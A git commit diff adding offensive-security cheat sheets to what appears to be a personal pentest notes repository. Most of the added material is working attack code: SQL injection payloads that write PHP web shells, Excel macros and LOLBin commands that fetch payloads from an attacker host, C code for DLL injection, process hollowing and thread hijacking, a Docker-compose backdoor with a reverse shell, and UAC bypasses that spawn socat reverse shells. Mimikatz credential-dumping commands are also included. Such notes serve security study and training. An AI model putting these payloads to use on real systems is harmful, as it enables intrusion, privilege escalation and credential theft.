new stuff

This commit is contained in:
Stefan Etringer 2022-04-14 01:06:16 +02:00
parent 2080dc8554
commit 9f4f3e08c0
25 changed files with 763 additions and 8 deletions

9
.gitmodules vendored
View File

@ -169,3 +169,12 @@
[submodule "enumeration/Subrake"]
path = enumeration/Subrake
url = https://github.com/hash3liZer/Subrake.git
[submodule "post_exploitation/bc_security/Empire"]
path = post_exploitation/bc_security/Empire
url = https://github.com/BC-SECURITY/Empire.git
[submodule "osint/LeetLinked"]
path = osint/LeetLinked
url = https://github.com/Sq00ky/LeetLinked.git
[submodule "hashes/namely"]
path = hashes/namely
url = https://github.com/OrielOrielOriel/namely

BIN
enumeration/hydra.restore Normal file

Binary file not shown.

View File

@ -114,3 +114,12 @@ sc config daclsvc binpath= "\"C:\shell.exe""
```sh
net start daclsvc
```
## Tips & Tricks
* [Sysinternal tools can be used without installing](https://live.sysinternals.com/)
* Execute through explorer via
```sh
\\live.sysinternals.com\tools
```

View File

@ -0,0 +1,14 @@
# CVE-2022-22965
* [Mitre CVE details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-22965)
* Follow up to CVE-2010-1622 by circumventing the patch for the vulnerability
* RCE of `*.jsp` files through tomcat HTTP post request
* Conditions
* > jdk9
* Spring framework < 5.2, 5.2.0-19, 5.3.0-17
* Apache tomcat
* spring as WAR package
* `spring-webvmc` or `spring-webflux` components of the spring framework

View File

@ -122,11 +122,22 @@ id=(SELECT banner FROM v$version) # oracle
```
## Insert
* Check user file permissions
```sql
union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- -
```
* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
```sql
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
```
* Insert `<?php system($_GET["cmd"]); ?>`
```sql
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
```
### Examples
* sqli inside HTTP request to an API. Five values inside select have been discovered before
```HTTP

View File

@ -5,8 +5,21 @@
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
## Enumeration
* Check paths
```sh
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```
* Check permissions on these paths
```
cacls "c:\program files\directory"
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"
```
## Example
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
* The unquoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
```sh
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
@ -37,4 +50,7 @@ Stop-Service -name "servicename"
Start-Service -name "servicename"
```
## PoC
* [MattyMcFatty's PoC](https://github.com/mattymcfatty/unquotedPoC.git)

View File

@ -0,0 +1,38 @@
# Macros
* Executes after user clicks enable content
* Open Excel
* View --> Macros --> Create New Macros
```c
Sub HelloWorld()
PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://%ATTACKER_IP%/passwd -OutFile C:\passwd", vbNormalFocus)
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
## Meterpreter
* Directly execute shell without user interaction
* Configure and run `use windows/misc/hta_server`
* Macro executes `mshta.exe`
```c
Sub HelloWorld()
PID = Shell("mshta.exe https://%ATTACKER_IP%:8080/c9496fz.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
## Msfvenom
* Create reverse shell via
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f vba -o surprise.vba
```

View File

@ -0,0 +1,81 @@
# DLL Injection
```c
DWORD getProcessId(const char *processName) {
HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
TH32CS_SNAPPROCESS, // Include all processes residing on the system
0 // Indicates the current process
);
if (hSnapshot) {
PROCESSENTRY32 entry; // Adds a pointer to the PROCESSENTRY32 structure
entry.dwSize = sizeof(PROCESSENTRY32); // Obtains the byte size of the structure
if (Process32First( // Obtains the first process in the snapshot
hSnapshot, // Handle of the snapshot
&entry // Pointer to the PROCESSENTRY32 structure
)) {
do {
if (!strcmp( // Compares two strings to determine if the process name matches
entry.szExeFile, // Executable file name of the current process from PROCESSENTRY32
processName // Supplied process name
)) {
return entry.th32ProcessID; // Process ID of matched process
}
} while (Process32Next( // Obtains the next process in the snapshot
hSnapshot, // Handle of the snapshot
&entry
)); // Pointer to the PROCESSENTRY32 structure
}
}
DWORD processId = getProcessId(processName); // Stores the enumerated process ID
```
* Open Process
```c
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, // Requests all possible access rights
FALSE, // Child processes do not inheret parent process handle
processId // Stored process ID
);
```
* Allocate memory
```c
LPVOID dllAllocatedMemory = VirtualAllocEx(
hProcess, // Handle for the target process
NULL,
strlen(dllLibFullPath), // Size of the DLL path
MEM_RESERVE | MEM_COMMIT, // Reserves and commits pages
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
```
* Write to memory
```c
WriteProcessMemory(
hProcess, // Handle for the target process
dllAllocatedMemory, // Allocated memory region
dllLibFullPath, // Path to the malicious DLL
strlen(dllLibFullPath) + 1, // Byte size of the malicious DLL
NULL
);
```
```c
LPVOID loadLibrary = (LPVOID) GetProcAddress(
GetModuleHandle("kernel32.dll"), // Handle of the module containing the call
"LoadLibraryA" // API call to import
);
HANDLE remoteThreadHandler = CreateRemoteThread(
hProcess, // Handle for the target process
NULL,
0, // Default size from the execuatable of the stack
(LPTHREAD_START_ROUTINE) loadLibrary, pointer to the starting function
dllAllocatedMemory, // pointer to the allocated memory region
0, // Runs immediately after creation
NULL
);
```

View File

@ -0,0 +1,156 @@
# Process Hollowing
* Target process which is in suspended state has to be created
```c
LPSTARTUPINFOA target_si = new STARTUPINFOA(); // Defines station, desktop, handles, and appearance of a process
LPPROCESS_INFORMATION target_pi = new PROCESS_INFORMATION(); // Information about the process and primary thread
CONTEXT c; // Context structure pointer
if (CreateProcessA(
(LPSTR)"C:\\\\Windows\\\\System32\\\\svchost.exe", // Name of module to execute
NULL,
NULL,
NULL,
TRUE, // Handles are inherited from the calling process
CREATE_SUSPENDED, // New process is suspended
NULL,
NULL,
target_si, // pointer to startup info
target_pi) == 0) { // pointer to process information
cout << "[!] Failed to create Target process. Last Error: " << GetLastError();
return 1;
```
* Malicious image has to be opened
```c
HANDLE hMaliciousCode = CreateFileA(
(LPCSTR)"C:\\\\Users\\\\tryhackme\\\\malware.exe", // Name of image
GENERIC_READ, // Read-only access
FILE_SHARE_READ, // Read-only share mode
NULL,
OPEN_EXISTING, // Instructed to open a file or device if it exists
NULL,
NULL
);
```
* Unmap memory from the process
```c
c.ContextFlags = CONTEXT_INTEGER; // Only stores CPU registers in the pointer
GetThreadContext(
target_pi->hThread, // Handle to the thread obtained from the PROCESS_INFORMATION structure
&c // Pointer to store retrieved context
); // Obtains the current thread context
PVOID pTargetImageBaseAddress;
ReadProcessMemory(
target_pi->hProcess, // Handle for the process obtained from the PROCESS_INFORMATION structure
(PVOID)(c.Ebx + 8), // Pointer to the base address
&pTargetImageBaseAddress, // Store target base address
sizeof(PVOID), // Bytes to read
0 // Number of bytes out
);
```
* Allocate and write into the memory unmapped
```c
DWORD maliciousFileSize = GetFileSize(
hMaliciousCode, // Handle of malicious image
0 // Returns no error
);
PVOID pMaliciousImage = VirtualAlloc(
NULL,
maliciousFileSize, // File size of malicious image
0x3000, // Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)
0x04 // Enables read/write access (PAGE_READWRITE)
);
```
```c
DWORD numberOfBytesRead; // Stores number of bytes read
if (!ReadFile(
hMaliciousCode, // Handle of malicious image
pMaliciousImage, // Allocated region of memory
maliciousFileSize, // File size of malicious image
&numberOfBytesRead, // Number of bytes read
NULL
)) {
cout << "[!] Unable to read Malicious file into memory. Error: " <<GetLastError()<< endl;
TerminateProcess(target_pi->hProcess, 0);
return 1;
}
CloseHandle(hMaliciousCode);
```
* Get handle of dll
```c
HMODULE hNtdllBase = GetModuleHandleA("ntdll.dll"); // Obtains the handle for ntdll
pfnZwUnmapViewOfSection pZwUnmapViewOfSection = (pfnZwUnmapViewOfSection)GetProcAddress(
hNtdllBase, // Handle of ntdll
"ZwUnmapViewOfSection" // API call to obtain
); // Obtains ZwUnmapViewOfSection from ntdll
DWORD dwResult = pZwUnmapViewOfSection(
target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
pTargetImageBaseAddress // Base address of the process
);
```
* Allocate memory for the target process
```c
PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)pMaliciousImage; // Obtains the DOS header from the malicious image
PIMAGE_NT_HEADERS pNTHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pMaliciousImage + pDOSHeader->e_lfanew); // Obtains the NT header from e_lfanew
DWORD sizeOfMaliciousImage = pNTHeaders->OptionalHeader.SizeOfImage; // Obtains the size of the optional header from the NT header structure
PVOID pHollowAddress = VirtualAllocEx(
target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
pTargetImageBaseAddress, // Base address of the process
sizeOfMaliciousImage, // Byte size obtained from optional header
0x3000, // Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)
0x40 // Enabled execute and read/write access (PAGE_EXECUTE_READWRITE)
);
```
* Write to the process memory
```c
if (!WriteProcessMemory(
target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
pTargetImageBaseAddress, // Base address of the process
pMaliciousImage, // Local memory where the malicious file resides
pNTHeaders->OptionalHeader.SizeOfHeaders, // Byte size of PE headers
NULL
)) {
cout<< "[!] Writting Headers failed. Error: " << GetLastError() << endl;
}
```
```c
for (int i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++) { // Loop based on number of sections in PE data
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((LPBYTE)pMaliciousImage + pDOSHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER))); // Determines the current PE section header
WriteProcessMemory(
target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
(PVOID)((LPBYTE)pHollowAddress + pSectionHeader->VirtualAddress), // Base address of current section
(PVOID)((LPBYTE)pMaliciousImage + pSectionHeader->PointerToRawData), // Pointer for content of current section
pSectionHeader->SizeOfRawData, // Byte size of current section
NULL
);
}
```
* Set entrypoint
```c
c.Eax = (SIZE_T)((LPBYTE)pHollowAddress + pNTHeaders->OptionalHeader.AddressOfEntryPoint); // Set the context structure pointer to the entry point from the PE optional header
SetThreadContext(
target_pi->hThread, // Handle to the thread obtained from the PROCESS_INFORMATION structure
&c // Pointer to the stored context structure
);
```
* Switch process state to running
```c
ResumeThread(
target_pi->hThread // Handle to the thread obtained from the PROCESS_INFORMATION structure
);
```

View File

@ -0,0 +1,55 @@
# Process Injection
## Shellcode injection
* Open a process
```sh
processHandle = OpenProcess(
PROCESS_ALL_ACCESS, // Defines access rights
FALSE, // Target handle will not be inhereted
DWORD(atoi(argv[1])) // Local process supplied by command-line arguments
);
```
* Allocate memory
```sh
remoteBuffer = VirtualAllocEx(
processHandle, // Opened target process
NULL,
sizeof shellcode, // Region size of memory allocation
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
```
* Write shellcode to memory allocated
```sh
WriteProcessMemory(
processHandle, // Opened target process
remoteBuffer, // Allocated memory region
shellcode, // Data to write
sizeof shellcode, // byte size of data
NULL
);
```
* Execute shellcode inside a created thread
```sh
remoteThread = CreateRemoteThread(
processHandle, // Opened target process
NULL,
0, // Default size of the stack
(LPTHREAD_START_ROUTINE)remoteBuffer, // Pointer to the starting address of the thread
NULL,
0, // Ran immediately after creation
NULL
);
```
* Compile
* Check processes via
```sh
Get-Process -IncludeUserName
```
* Run on process ID as argv1

View File

@ -0,0 +1,79 @@
# Thread Hijacking
* Open process, allocate and write memory
```c
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, // Requests all possible access rights
FALSE, // Child processes do not inheret parent process handle
processId // Stored process ID
);
PVOIF remoteBuffer = VirtualAllocEx(
hProcess, // Opened target process
NULL,
sizeof shellcode, // Region size of memory allocation
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
);
WriteProcessMemory(
processHandle, // Opened target process
remoteBuffer, // Allocated memory region
shellcode, // Data to write
sizeof shellcode, // byte size of data
NULL
);
```
* Snapshot the process and get the first thread
```c
THREADENTRY32 threadEntry;
HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
TH32CS_SNAPTHREAD, // Include all processes residing on the system
0 // Indicates the current process
);
Thread32First( // Obtains the first thread in the snapshot
hSnapshot, // Handle of the snapshot
&threadEntry // Pointer to the THREADENTRY32 structure
);
while (Thread32Next( // Obtains the next thread in the snapshot
snapshot, // Handle of the snapshot
&threadEntry // Pointer to the THREADENTRY32 structure
)) {
```
* Get Pointer to the thread
```c
if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
{
HANDLE hThread = OpenThread(
THREAD_ALL_ACCESS, // Requests all possible access rights
FALSE, // Child threads do not inheret parent thread handle
threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
);
break;
}
```
* Suspend threat ,get context and change `$rip`
```
SuspendThread(hThread);
CONTEXT context;
GetThreadContext(
hThread, // Handle for the thread
&context // Pointer to store the context structure
);
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
```
* Set context and resume the thread
```c
SetThreadContext(
hThread, // Handle for the thread
&context // Pointer to the context structure
);
ResumeThread(
hThread // Handle for the thread
);
```

1
hashes/namely Submodule

@ -0,0 +1 @@
Subproject commit 8736d08a096695069b1d5cfa7ac20e5a874980db

View File

@ -103,4 +103,10 @@ Get-NetDomainTrust
ls -d <Domain>
```
### Tips & Tricks
* Download and execute in one line
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"
```

View File

@ -32,7 +32,7 @@ snort -c <config> -T
* Logged by IP as directory, ports as files inside these dirs
* BPF filter can be used like `tcp port 80`
* Log files can be opened by wireshark or tcpdump
* Log files can be opened by wireshark or `tcpdump -r <logfile>`
| Parameter | Description |
|-----------|-------------|
@ -115,7 +115,7 @@ alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; sid: 100001; rev:
* `/etc/snort/rules/local.rules`
* ASCII or gex mode
```sh
ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; sid: 100001; rev:1;)
ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET";content: "/foo"; sid: 100001; rev:1;)
alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;)
```
* Case insensitiv

1
osint/LeetLinked Submodule

@ -0,0 +1 @@
Subproject commit 9032c973e413199990b77e73a7d3896e3f5ba77f

View File

@ -25,6 +25,8 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
```sh
proxychains nc <IP> <PORT>
proychains nmap <IP>
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
```
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
```
@ -36,7 +38,7 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
#socks5 127.0.0.1 1337
# proxy_dns
```
* FoxyProxy
* FoxyProxy, choose proxy type, proxy IP and port in settings
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
@ -153,3 +155,22 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```
#### Meterpreter Auto Routing
* Upload payload and catch it with `multi/handler`
```
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run
```
#### Meterpreter Proxy Routing
* Specify socks proxy via
```sh
use auxiliary/server/socks_proxy
```

@ -1 +1 @@
Subproject commit ec3377c5a4bedce31983828af93b584a0c6e8907
Subproject commit 6a6f0881798ce92a54ce9896d2ffe4855855872d

View File

@ -9,8 +9,17 @@ cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Database
psexec.py domain.name/<user>:<password>@<target-IP>
```
## Shares
* Check user permissions on shares
``sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
## SMB
* Check user hash on the network via smb
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```

View File

@ -1,11 +1,26 @@
# IDS & IPS Evation
* Evation by manipulation of
* Tool parameters
* Protocol
* Payload
* Route
* Or DoS
## Enumeration
* [User-Agents](https://developers.whatismybrowser.com/useragents/explore/)
### nmap
* `--script-args http.useragent="<user-agent>"`
* `-Ss` half open
### nikto
* `-useragent <user-agent>`
* Tuning `-T 1 2 3`
* __NOT__`-evasion <encoding-technique>`, it increases detection
## Protocol Manipulation
### Relying on another protocol
@ -75,5 +90,25 @@ socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
* SSL/TLS certs
* DNS beacon, storing exfiltrated data in the query
## Backdoors
* Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file
### Docker
* Create a `docker-compose.yaml` file with a reverse shell as an entry point, mount the host volume to `/mnt` inside the container
```yaml
---
version: "2.1"
services:
backdoorservice:
restart: always
image: <Found image>
entrypoint: >
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")'
volumes:
- /:/mnt
privileged: true
```

View File

@ -1,15 +1,22 @@
# Mimikatz Usage
* Check your privilege, boy
```sh
$ privilege::debug
privilege::debug
token::elevate
```
## Dump hashes
* NTLM
```sh
$ lsadump::lsa /patch
```
```sh
sekurlsa::tickets /export
```
## Dump Local Password hashes
```sh
token::elevate
```
@ -17,6 +24,11 @@ token::elevate
lsadump::sam
```
* Form logged in users
```sh
sekurlsa::logonPasswords
```
## Golden ticket
* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi
```sh

View File

@ -29,6 +29,17 @@ Get-NetFirewallRule | select DisplayName, Enabled, Description
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
```
* Check Windows Defender and its active rules
```sh
powershell -c "Get-MpPreference"
powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id
```
* Check tamper protection, and [bypass](https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1)
```sh
reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection
```
## Reset Options
```sh
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False

View File

@ -0,0 +1,60 @@
# LOLBINS
* [LOLBAS](https://lolbas-project.github.io/)
* All binaries are signed by Microsoft
* Shows paths to the binary
## Ingress Tool Transfer
* [certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload encoding as well
```sh
certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
certutil.exe -encode shell.exe encoded-shell.txt
```
* [bitsadmin](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin)
```sh
bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
```
* findstr
```sh
findstr /v dummystring \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe
```
## Indirect Command Execution
* Explorer as parent process to execute other PEs
```sh
explorer /root, "C:\Windows\System32\cmd.exe"
```
* Windows management instrumentation
```sh
wmic.exe process call create calc
```
* `rundll32.exe`
## Bypass Whiteslists
* `regsvr32.exe` can execute PEs in memory, even remotely
* DLL has to match architecture
```sh
C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll
C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll
```
* `bash.exe -c calc.exe`
## Shortcut Modification Technique
* Execute PEs via shortcuts
* Clone [powerlessshell](https://github.com/Mr-Un1k0d3r/PowerLessShell.git)
* `msfvenom` with `windows/meterpreter/reverse_winhttps`
* Set `multi/handler` with `set payload windows/meterpreter/reverse_winhttps`
* Transform to `*.csproj`
```sh
python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj
```
* Execute on target
```sh
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj
```

View File

@ -0,0 +1,129 @@
# User Account Control
* Change permissions of a process or its resources
* Mandatory Integrity Control (MIC)
* Feature of MAC, assigns integrity level on permissions
* Low
* Medium
* High
* System
## Login Tokens
* Access tokens are given to users at login
* __Non Administrator Token__, integrity level low
* __Filtered Token__, stripped administrative permission, integrity level medium
* __Elevated Token__, elevates to integrity level high
## User Account Control Settings
* __Always notify__
* __Notify me only when programs try to make changes to my computer__, shows UAC dialogue
* __Notify me only when programs try to make changes to my computer (do not dim my desktop)__
* __Never notify__, never show UAC dialogue
## How UAC Works
Application Information Service, a.k.a Appinfo
* User requests elevated permissions
* `ShellExecute` API call is made via `runas.exe`
* Request to Appinfo
* Application manifest is checked if AutoElevation is set to on
* Appinfo runs `consent.exe`, dialogue opens up
* User clicks yes, token is checked. PPID of the newly created porcess will be pointed to the shell from which the request originates, while the login token is elevated. Otherwise it is denied
## Bypass
* UAC is seen as a convenience function, not a security function
* `Mandatory Label` is shown via `whoami /groups`
### GUI
#### msconfig
* Open `msconfig`, always got integrity level high via auto elevation
* On Tab `Tools` choose `Command Prompt` and press `Launch` to get an elevated `cmd.exe`
#### azman.msc
* Open `azman.msc` --> `Help` --> `Help Topics`
* Right click help article --> `view source`
* `Open` --> `File`, select `All Files`
* Dialogue opens up, go to `C:\Windows\System32\cmd.exe` and right click on it to open
#### Autoelevate Process
* Binary must be signed
* Must be in a trusted dir like `Program Files` or `Windows`
* Additionaly, portable executables need `autoelevate` in the manifest. Check via
```sh
sigcheck64.exe -m <portable_executable.exe>
```
* `mmc.exe` autoelevates depending on user request for msc-snapin
* Most `*.msc`s, `spinstall.exe`, `pkgmgr.exe` as well as [COM objects autoelevate](https://docs.microsoft.com/en-us/windows/win32/com/the-com-elevation-moniker)
### Commandline
#### Fodhelper.exe
* Default applications are stored in `HKEY_LOCAL_MACHINE\Software\Classes` which is superseded by the current user profile `HKEY_CURRENT_USER\Software\Classes`
* `ms-settings` ProgID is searched for by `fodhelper.exe`, this setting overrides system defaults of which executable opens the filetype
* The subprocess of `fodhelper.exe` inherits intergrity level high
* Open reverse shell on attacker and
```sh
whoami
net user <user> | find "Local Group"
whoami /groups | find "Label"
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
```
* Clean up via
```sh
reg delete HKCU\Software\Classes\ms-settings\ /f
```
* When Windows Defender is enabled use [v3d3d's improvement for bypassing Windows Defender](https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses)
```sh
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
```
### Scheduled Tasks
* UAC will not be triggered on scheduled tasks
* DiskCleanup calls `%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%`
* Set `%windir%` to a reverse shell via
```sh
reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:$TARGET_IP:4711 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f
```
### Automated Bypass
* [hfiref0x's automated bypass named UCAME](https://github.com/hfiref0x/UACME.git)
## Detection
* https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/

View File

@ -48,7 +48,7 @@ wmic service list brief | findstr "Running"
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)
### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)
* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)
### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`

View File

@ -1,4 +1,6 @@
# msfvenom usage
# msfvenom Usage
* [Cheat Sheet](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/#waf-and-antivirus-detectionav-bypass-using-msfvenom-encoders)
```
msfvenom -p <payload> <options>